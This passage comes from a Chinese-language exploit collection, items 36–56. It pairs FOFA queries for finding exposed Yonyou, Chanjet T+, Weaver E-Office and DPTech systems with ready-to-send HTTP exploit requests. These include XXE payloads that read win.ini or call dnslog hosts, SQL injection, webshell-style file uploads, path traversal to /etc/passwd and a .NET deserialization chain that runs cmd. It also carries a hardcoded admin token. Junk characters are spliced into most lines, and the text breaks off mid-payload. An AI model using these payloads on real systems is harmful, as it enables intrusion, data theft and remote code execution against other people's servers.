User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" S4 B' @) A& q4 Q2 a+ h
Accept-Encoding: gzip, deflate
, N9 B& \# N$ D$ T4 A& JAccept: */*
/ l& F" _' B0 E. W' LConnection: close! R0 M. r8 t* K% V n$ e
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
* j* T4 @/ U; ~$ NContent-Length: 190& `2 _ m# @5 [( Q: U, }2 F
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df08 N. f7 j: u! J& V
% H7 k$ |8 e( C. M) A--fd28cb44e829ed1c197ec3bc71748df0
+ X* F- ?% \0 C- k7 SContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
, w9 {$ ^$ R3 c: o: y$ o* F- S/ B4 g
<%out.println(1111*1111);%>1 A/ |/ U; R; l, x
--fd28cb44e829ed1c197ec3bc71748df0--4 B. l6 R: ^/ ?: f* x
+ d0 ~5 P- f* `6 w
: ]0 h( [9 @4 n7 B36. 用友NC-Cloud soapFormat XXE. i' G8 {: t+ i# K: K; |) ~
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
0 r o4 `0 f; t2 C; o+ b! LPOST /uapws/soapFormat.ajax HTTP/1.1 |$ ]2 N3 p! K4 |, G6 F/ Q
Host: 192.168.40.130:8989% k2 I2 O. W# B8 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 S& a0 v5 U! Z* o0 d ~( j
Content-Length: 263) F( a: i6 L) o6 k. t6 E; J7 _3 L6 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( d* {1 `. t! M, Q |
Accept-Encoding: gzip, deflate
) p5 m' k, G2 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- a% j" `0 O4 o W3 ~1 {; ?1 {Connection: close. L1 [9 m$ c+ ~2 A, @# Q
Content-Type: application/x-www-form-urlencoded0 g# ]% X3 H0 w2 z g8 C1 }
Upgrade-Insecure-Requests: 1
# K7 i' p: b8 h1 S) L* ?0 o% `) H" X0 J3 q5 |; L8 o, I3 s
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
7 y: [% i' w8 ^! [ n: Z; I* C) x! ~! [5 L8 G4 t1 a
% E( l8 j: F* K' F U: @
37. 用友NC-Cloud IUpdateService XXE( M# n6 K6 ?! Y- p5 C4 v4 [7 i
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 C: p6 B b' @3 b: SPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1& x* h/ }* E7 y
Host: 192.168.40.130:8989( b, \! {/ u, N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
9 h4 _! B' O( `: V1 ?2 z( v9 s6 }3 M" BContent-Length: 421. K+ s3 b3 n5 X& }/ l% P2 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* ^. z9 A( q* o/ ]; b$ jAccept-Encoding: gzip, deflate
$ e5 p8 M2 Z( }; \9 R9 L* ~Accept-Language: zh-CN,zh;q=0.9# F* |' l0 \9 n. F# R- o
Connection: close* ^) N: G& {9 ^3 Q5 P
Content-Type: text/xml;charset=UTF-8% j' ?8 v9 D8 W" n1 V3 I; E" u/ r
SOAPAction: urn:getResult& R. a6 M5 F, y" o! d; x9 w
Upgrade-Insecure-Requests: 1- S5 {6 B/ j% o( S9 H
# y X$ H, C L3 `) i
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService"> f* S: B6 E( \
<soapenv:Header/>
& V$ Z8 v% d- {# A<soapenv:Body>; H& d0 X9 _+ t' q
<iup:getResult>
- X0 x! `3 m# Q% E; p<!--type: string-->) ]) j. J3 j) a+ K4 r. a
<iup:string><![CDATA[+ T7 ~( M, A( z0 k2 T4 C6 ]
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
; J5 ^0 d0 Y1 Y& i$ K7 F<xxx/>]]></iup:string>( v9 p' C" n$ J
</iup:getResult>" T; K* O5 z% a P6 Y5 B: z
</soapenv:Body>
% A( u& R' C' t% {7 O</soapenv:Envelope>
4 m( S @ [, x' m; E" o: n2 @
: N L" f8 I5 n$ r/ p) V+ c+ D/ ~" j) L# l u0 r" ~3 h- M
/ N p! [4 L! w* j& C( F38. 用友U8 Cloud smartweb2.RPC.d XXE" O, V( Z" N7 D
FOFA:app="用友-U8-Cloud"
' s: J: o! M; F9 _ }& u, p- |" pPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
) W: u7 u3 d& |) IHost: 192.168.40.131:80884 o# P3 _2 _. Z1 K7 g7 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
+ Z5 e3 Z* o& {7 }& F5 _0 W, ^6 q/ J; vContent-Length: 2609 {" G$ |7 I9 X+ J+ @$ U7 h7 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
, E r8 [% ] VAccept-Encoding: gzip, deflate
% Q* ?; x! f3 a5 D1 T) oAccept-Language: zh-CN,zh;q=0.9
' ]% V( x+ B) d4 }/ [6 ZConnection: close
+ L) x8 ]) I5 t& i6 hContent-Type: application/x-www-form-urlencoded: n- T/ g4 h0 l6 B$ U
. [' F# g+ G1 U
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
4 ? |( \( |& p, D- z. l+ f
& T: }+ a1 W3 Q! X% t
. ]) S+ M" F# u1 v39. 用友U8 Cloud RegisterServlet SQL注入' Q; ~9 R7 O3 H1 D5 z! p
FOFA:title="u8c"# C3 h( L8 g' C1 O9 Y( M1 [
POST /servlet/RegisterServlet HTTP/1.14 {/ z2 G$ E0 b. p9 y
Host: 192.168.86.128:80898 Y. c4 K4 t! D5 i, V; o+ U2 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% `/ Z; U) m9 M7 w( vConnection: close
1 s# ]; e9 O5 W; F: ]1 CContent-Length: 854 ?) g) p- A8 U3 U8 U0 \
Accept: */*( U/ {- V+ `- W/ n; X
Accept-Language: en
% B- \$ A8 \" @) T' o# ?Content-Type: application/x-www-form-urlencoded
6 N L+ K( M- g& eX-Forwarded-For: 127.0.0.1% J* z% K: T7 E+ U0 G' x9 i2 n
Accept-Encoding: gzip7 U j1 r' V' Y
# {; Q! Q; D# z; w4 H. N* Susercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--/ a+ d3 f- W, q1 ?- l% v( ?
% _3 |3 J4 f/ H/ W& i$ A A, b
8 ]) K: i& K! D" W# G6 P
40. 用友U8-Cloud XChangeServlet XXE
7 r9 A: y8 }2 X8 f- {1 eFOFA:app="用友-U8-Cloud"
7 M" O: J% t+ `3 _/ h4 y( f: E* uPOST /service/XChangeServlet HTTP/1.17 V; P1 c7 F( N* w* U" @ a( z
Host: x.x.x.x4 q+ V! t' G# s* x1 B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 |1 p* I/ S% n# j; M6 d' {Content-Type: text/xml
! m0 T) r7 x3 e& uConnection: close* |% q6 g& W( x* U; i/ ?4 z
/ L& L. U- J' I- i<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
+ D. g6 l9 K6 c) c$ V- e" z7 X/ U* U1 g% H) E5 M9 i
0 W, ^; \4 b! W6 S) F& U( }41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
* t8 _2 w% O6 q0 L2 iFOFA:app="用友-U8-Cloud"
) q- W& B8 q* p2 y' yGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1. T7 k+ v& V$ }) n U
Host:
: _$ f& f6 g1 l: O' y! m! I6 `3 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 s1 H6 u+ p! C% \Content-Type: application/json x% G/ h9 f8 Y
Accept-Encoding: gzip, D% d2 R$ ^* n* k6 `( m: N
Connection: close
. S J( w2 U- K! Y: D ~" K9 {& J3 v9 {; ~6 b& r
3 @6 }: L' r7 T& D' \42. 用友GRP-U8 SmartUpload01 文件上传
6 k5 B3 s+ G, X7 BFOFA:app="用友-GRP-U8"; c, A) ~6 g0 Z d( P. B1 \% X
POST /u8qx/SmartUpload01.jsp HTTP/1.11 p4 x c- P$ K" [9 C! b
Host: x.x.x.x
4 o; b+ E" i4 g& z' }, QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt7 \) R8 m* u1 a9 p' T% a% [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
" @8 q' C! s5 J- q! y6 ?1 \( ?* O7 M- V7 P
PAYLOAD
' S- a* c s! H7 m) f! Z% v
- G& J+ x# Y, R# }1 d- W+ K6 @1 [2 |0 ^+ m$ @% j1 A
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
1 u. x. H4 L. ~
d. x% a( R9 S+ b43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ ~) J; @2 k8 C- I6 T
FOFA:app="用友-GRP-U8"9 a6 Y1 F; ?0 y" G6 p
POST /services/userInfoWeb HTTP/1.1
: F' F+ w7 N& M6 G0 h9 r! v# h3 y9 i8 c" jHost: your-ip
9 R' w, R$ H5 S! x7 @! q M/ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" J8 |& r' f5 Q$ H! kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ e0 K- o; _! m
Accept-Encoding: gzip, deflate
) p' ?$ d# ^; l2 k3 @Accept-Language: zh-CN,zh;q=0.9
/ J0 h5 @& G7 N- BConnection: close
3 G! H" o( } O( A. r7 hSOAPAction:! p9 x7 ^! p8 M, ^+ Z8 P
Content-Type: text/xml;charset=UTF-8
/ u- B' K/ ~: A5 |0 c, K2 \% B; Q: X# c4 Q9 h
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
) F& v7 E I6 ~+ u <soapenv:Header/>% X3 L: q' \3 i6 l
<soapenv:Body>( i; j2 A, c4 x! Q; f. j1 }
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
& B Q& w3 C/ o+ l <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
2 Z% F! i0 x4 x+ q+ M, O </ser:getUserNameById>
# h, b) Y% O% {# P1 `* j3 M( f </soapenv:Body>
* k) _' ^" _% G2 B+ d</soapenv:Envelope>
; I6 V' @/ H4 E2 O8 l: D
! Q# C) _0 w7 a' ^
; @: {6 F/ y4 h' {: F# F+ u44. 用友GRP-U8 bx_dj_check.jsp SQL注入( S$ L- o- N8 K1 a' v
FOFA:app="用友-GRP-U8"
6 O0 `5 G. ^- l0 E( HGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1 y7 m) V" H! p
Host: your-ip) @7 B1 B/ [/ Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.364 l0 T6 E; y; [5 j0 A' E7 @- d# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, M/ A# g4 g2 Z# ^, b8 ZAccept-Encoding: gzip, deflate
: E& r$ Q3 [5 o1 e0 ~Accept-Language: zh-CN,zh;q=0.9
# I$ J+ a8 M% Q' O/ uConnection: close4 R' N2 _: p- R' J m
], o; ^0 W9 ?4 h& |/ v
; f/ i4 K, t, C6 B
45. 用友GRP-U8 ufgovbank XXE
' N: Z+ |) f! dFOFA:app="用友-GRP-U8"
' x: |- t2 g, d8 B$ cPOST /ufgovbank HTTP/1.1$ c" \ ?( `9 L2 |2 b2 g2 n% k, N
Host: 192.168.40.130:222
/ {& f0 Y) p1 C2 L+ F( zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.06 I/ h8 n d+ T
Connection: close1 H: m: E. A- f
Content-Length: 161
. @5 J7 w: z: r. e5 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ {- L) k" C4 }1 I& @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) p0 E6 c9 v2 h/ jContent-Type: application/x-www-form-urlencoded$ g$ H* U2 y5 u# [$ ~
Accept-Encoding: gzip
# G' i0 m, G: t O' C/ R
8 _' T. C/ i% W$ Z' @) L5 `8 w6 T3 preqData=<?xml version="1.0"?>
$ \+ D, |1 t4 m" W |<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
% C* m( M$ N' I" d: `4 l
/ R8 D1 `- {1 v% ?4 ~7 M r. r, `6 G& G2 {: k) a' p4 u
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
& V+ t2 ^8 Q9 x$ J/ BFOFA:app="用友-GRP-U8"
. N, v7 b: m/ V6 _5 P+ uGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.10 d# I7 M3 _6 z! J/ {) [
Host: your-ip
7 L N" k1 `: G) g- v# iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.366 N* X* p( a2 {% f8 A* {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ F0 U, F. v# c9 k
Accept-Encoding: gzip, deflate
2 H( V9 }) g' P9 M# {' I; n* jAccept-Language: zh-CN,zh;q=0.92 X; X8 V( r0 c: _8 q
Connection: close _! ~4 j- |- q* B( C3 i& r1 Q
! q# u( J5 h v+ T( p& t
6 d2 S# r0 z0 n# U3 w47. 用友GRP A++Cloud 政府财务云 任意文件读取
. d0 R( N; Q4 j1 m$ ?* T: HFOFA:body="/pf/portal/login/css/fonts/style.css": _4 R& S4 ~ w$ F
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
* e4 B8 H3 ?5 a/ }; aHost: x.x.x.x" k) G% V- g, u9 E7 ]. [5 J) h
Cache-Control: max-age=0( h+ G3 R+ M/ Z! A) r$ x( Z
Upgrade-Insecure-Requests: 16 f: n1 q6 |# V H; U. F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 E- z' ~2 T. U1 j5 G; yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: B4 Y) C6 W$ d! TAccept-Encoding: gzip, deflate, br. A. H& V: R$ R0 h6 J
Accept-Language: zh-CN,zh;q=0.92 O$ V9 V! |3 F9 F
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
+ [' q; L5 R4 b4 Q2 v/ BConnection: close
1 Z; G! p; d. I7 v# v2 \" j, r
" G: I8 A/ @& s9 b1 ?7 D- i
9 q& t$ T' R. v$ _1 }8 p F# o& { y. A9 k1 L$ K5 h
48. 用友U8 CRM swfupload 任意文件上传
4 v; G* b$ @( K7 r$ nFOFA:title="用友U8CRM"
' B; b/ a& D1 y3 B, G5 }POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 e' G: L! F; |( W+ ^; THost: your-ip
( o4 u+ `: s+ g6 P2 l, GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 x# o8 U# v: Z( e: Q2 @7 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 Q5 z) R t& w v' N, e0 E/ u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: Z( c7 o* u, K, `+ P( J5 `
Accept-Encoding: gzip, deflate' y# x, G; t7 t' \+ [* C4 t
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855+ C6 _' R( }2 P" u( X
------269520967239406871642430066855% z& n7 B: z& v: X+ u P
Content-Disposition: form-data; name="file"; filename="s.php"- \9 b% z. D! o3 Y7 l' C+ n( n
1231
u& `" {1 O8 _; n) b. DContent-Type: application/octet-stream+ _5 G1 K! }- F2 I) l+ o; W; T C
------2695209672394068716424300668558 U+ e# v9 d7 E
Content-Disposition: form-data; name="upload". }6 c' c+ ]7 A+ Q( m
upload
( L! c8 W' b) _" R. e" z------269520967239406871642430066855--
2 H, k; s: x5 a
0 L2 L# y" c T
, d$ w: ?2 P& ]/ L49. 用友U8 CRM系统uploadfile.php接口任意文件上传
K- N7 v5 G1 n* } V; F' v$ QFOFA:body="用友U8CRM"
o* {5 F, ^. O, x: L# Y) W: O7 q1 I) I6 C
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
& t( k$ N4 {' f* s( E2 z- MHost: x.x.x.x7 [! A/ d% g8 @7 W& D+ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# A8 T. T8 J; |; G& V
Content-Length: 329( J* [( j& m- O/ S7 S/ a6 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- C/ M9 ~! l! m" x& WAccept-Encoding: gzip, deflate8 n1 b9 z2 y2 i) C; i" } h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 S! y" @* K% h% S0 \
Connection: close
7 y* ]4 r: J# XContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w3 c; ]0 A6 l$ k/ N/ ^2 l
$ O5 d/ ~6 z5 z6 s' p0 m
-----------------------------vvv3wdayqv3yppdxvn3w( E) {4 n8 M3 F- ^- }2 u
Content-Disposition: form-data; name="file"; filename="%s.php " B2 N# S( s3 |9 ^
Content-Type: application/octet-stream
- |) [( {+ H! l7 J F8 r0 G: W: F$ g9 {
wersqqmlumloqa' `7 n! t3 S5 b" I& I+ W) j7 S! h
-----------------------------vvv3wdayqv3yppdxvn3w9 B! Z$ p7 V, ]0 ?
Content-Disposition: form-data; name="upload"
8 w( E) S& l% A6 ~( B
# j" ]; M. e8 |- q. g4 supload
6 e/ ~9 `+ X: `1 p$ u: ]# G, ]-----------------------------vvv3wdayqv3yppdxvn3w--
, T; L7 A& ?* u9 p& ^
; I, E5 z( I* x. [8 H2 P
+ {) u% Y: `# chttp://x.x.x.x/tmpfile/updB3CB.tmp.php6 V! k9 i1 S; M6 y% e, v
K$ E* Z3 ?6 \
50. QDocs Smart School 6.4.1 filterRecords SQL注入
6 m# {( R8 J8 C) v) eFOFA:body="close closebtnmodal"
* x7 l4 S( ^9 }& QPOST /course/filterRecords/ HTTP/1.1! r7 T( N- z ]5 x
Host: x.x.x.x
; V* V( M. r1 w: DUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& K1 W1 i4 @4 k3 X/ @. ]
Connection: close' e. y, y! {# g
Content-Length: 224
. G4 O# g" w0 c, P( ~/ P$ |" UAccept: */*9 T8 Z& i* Z6 A
Accept-Language: en6 m t, n: _( G, r: B. S# z
Content-Type: application/x-www-form-urlencoded) a8 | Y1 |) i2 ?/ [
Accept-Encoding: gzip$ Y* o1 _, C5 H% _& V4 Y0 p
4 d" y2 S7 r Z7 \% K
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=14 z2 I' g% z+ ]/ [2 D
7 h" w/ B, n. ^2 w& w4 E7 h
/ D2 M n: O, ~/ T6 V3 u51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 c7 N" H, g. P5 P! ZFOFA:app="云时空社会化商业ERP系统"8 T' Z& C: t0 C9 j$ c
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1- {" Z2 V3 K8 {
Host: your-ip
& p' W7 D* w( D3 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
, ~3 ]3 D0 K3 d/ j+ K) Q; lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% T* ~7 U( d2 W. ^Accept-Encoding: gzip, deflate
# S* s( e8 h) ?' ? S7 aAccept-Language: zh-CN,zh;q=0.9
7 ?5 U9 h( x5 X. m0 m2 fConnection: close8 {8 y: ?3 O' z. q! m
' B3 X# v! f" N) K5 v. e
6 N% F& g0 K9 W, ^, J% c" N
52. 泛微E-Office json_common.php sql注入
7 \$ A) c$ `$ {5 g' GFOFA:app="泛微-EOffice"+ w- E1 `8 k- X
POST /building/json_common.php HTTP/1.1* F' y+ R2 g: {. [0 |
Host: 192.168.86.128:80975 Z' }) X1 Z3 t- G; O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) u* I) Z% T3 X, C7 n- t2 y
Connection: close
0 n6 s% |' d1 w" p- c% kContent-Length: 87" s0 T& Z \. c
Accept: */*
9 Z$ m+ m. z) h# a5 CAccept-Language: en4 N/ f" i4 p s6 @( U
Content-Type: application/x-www-form-urlencoded4 Z9 F, j8 m8 j! C- a) \
Accept-Encoding: gzip
+ g% a: x# \$ A5 L/ N8 X: q3 ]5 v8 F* n
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3336 `4 ?% m/ R5 U [: H3 R) k
- D3 o' O% f& ~5 t% e& J8 K" t+ t3 M: O2 b
53. 迪普 DPTech VPN Service 任意文件上传, v$ g; b p O! _7 m3 f
FOFA:app="DPtech-SSLVPN"
2 y; i& ?! ?! C& P/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd T2 y7 r/ k4 ^
+ f. F1 _& J2 }6 \! [
2 W2 F, F1 z g' v8 G54. 畅捷通T+ getstorewarehousebystore 远程代码执行4 m; T% x2 b+ X3 v0 U4 }* M: v
FOFA:app="畅捷通-TPlus"6 z/ F# g T" L7 O; R+ s+ T" e( B
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件7 K0 b2 M. p6 ^* b
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"* S v6 q6 I* H9 F
4 N4 s+ p4 `5 F0 i2 o# Z3 t) M) D3 T6 q0 H
完整数据包, k. H8 F4 M" @/ F1 S
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
$ k6 j% K( Y2 M" c- b+ ~) eHost: x.x.x.x
. Y `3 a- j2 O6 v/ E0 A- E dUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 ^6 v$ F# u- j C7 T
Content-Length: 593
$ i/ ?0 {' O2 w( ?% x
! D5 @' I' O+ q3 T+ L1 x{
0 m& P4 v7 D6 Q% J& z"storeID":{
2 x1 }9 B; y/ R I& j7 _ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",/ W) ?. T! ~- N8 Z. r
"MethodName":"Start",2 f. |; F0 m6 `* |% c
"ObjectInstance":{7 C1 E4 k% U0 `+ J6 s
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
1 I/ C+ @2 T ?) |5 L5 x. n "StartInfo":{: q8 S1 M* y+ V; m8 l! C
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 y5 V5 X5 v1 W" W! A "FileName":"cmd",
' l* P. p& U( \& D/ Y8 c3 y "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, h* M' v4 b/ f: G# l7 w }
/ s2 s1 N6 T p/ L$ q1 ~1 z" X }% F- O& b8 N/ @; M/ Z
}" _. X8 z8 l5 V' j1 v ]
}. m5 @6 J) n$ \: o* p
& U9 B# g+ E% ^/ J) E4 `* G3 \. T
) c: V- o; V/ p
第二步,访问如下url0 ^9 U% W# u1 W* t: Y. A3 L
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
" Y, e* I! b, t8 e" ?
1 C" v9 ]- J; F( s% |1 @4 @ ?
. V# N- h* a8 e+ P55. 畅捷通T+ getdecallusers信息泄露6 ]9 x) I: E# a! C4 k, b
FOFA:app="畅捷通-TPlus"
/ T$ E G# n9 j第一步,通过
/ p) r7 ^7 i6 {: U9 \/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
2 d: w# R! _2 W- E第二步,利用获取到的Cookie请求* y- |1 s( h4 w& M
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers6 G' Z/ q! g9 Y( a
# K! a. I5 ~/ \" e& F$ ?0 I
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
4 r0 K/ s& q! b8 o) VFOFA: app="畅捷通-TPlus" h+ r: P: c0 F6 E0 v
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( N# d- ? @# n/ Z6 R' e- @Host: x.x.x.x1 d# r* g4 X& G5 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36( ~3 E) T3 d) A; H
Content-Type: application/json* r: T# O# c6 `. n. T
) D9 Y1 t: G0 B8 x7 M5 Q$ S
{* ^; t& _- |& @/ z
"storeID":{
6 r: e( o# Z6 F6 [# b "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",6 \- Q$ B0 \0 l) ?' r7 J; C( c
"MethodName":"Start",# F. H1 `) O9 J: C
"ObjectInstance":{# Z. E+ j5 s" k$ F
